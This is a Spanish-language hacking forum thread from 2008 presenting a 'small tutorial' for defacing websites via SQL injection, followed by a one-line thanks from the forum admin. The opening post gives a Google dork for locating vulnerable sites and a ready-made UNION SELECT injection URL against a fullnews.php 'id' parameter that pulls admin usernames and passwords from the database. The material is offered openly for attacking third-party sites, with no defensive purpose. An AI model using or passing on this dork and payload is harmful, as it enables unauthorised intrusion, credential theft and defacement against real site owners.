Foro del Hacker
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.
Foro del Hacker

Bienvenidos al Foro del Hacker.
 
ÍndiceÍndice  BuscarBuscar  Últimas imágenesÚltimas imágenes  RegistrarseRegistrarse  ConectarseConectarse  

 

 Intrusión mediante Inyección SQL [By Dreahss]

Ir abajo 
2 participantes
AutorMensaje
Druéh

Druéh


Cantidad de envíos : 19
Fecha de inscripción : 25/02/2008

Intrusión mediante Inyección SQL [By Dreahss] Empty
MensajeTema: Intrusión mediante Inyección SQL [By Dreahss]   Intrusión mediante Inyección SQL [By Dreahss] Icon_minitimeLun Feb 25, 2008 8:40 pm

[Pequeño Tutorial]Desfac mediante inyección SQL

Dork:
"Browse with Interactive Map"[[al poner esto en google,este nos mostrara las paginas con esta vulnerabilidad]]

Bien,seguido de esto entrariamos a la pagina y usariamos el exploit,que es el siguiente

www.La pagina que probemos.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*

si esto resulta,se nos mostrara el nombre del admind y la pass
Volver arriba Ir abajo
Admin
Admin
Admin


Cantidad de envíos : 128
Fecha de inscripción : 02/10/2007

Intrusión mediante Inyección SQL [By Dreahss] Empty
MensajeTema: Re: Intrusión mediante Inyección SQL [By Dreahss]   Intrusión mediante Inyección SQL [By Dreahss] Icon_minitimeLun Feb 25, 2008 10:34 pm

Gracdias por tu Aporte Men. va hacer de gran utilidad. Laughing
Volver arriba Ir abajo
http://forodelhacker.tk
 
Intrusión mediante Inyección SQL [By Dreahss]
Volver arriba 
Página 1 de 1.

Permisos de este foro:No puedes responder a temas en este foro.
Foro del Hacker :: Aportar Conocimiento-
Cambiar a: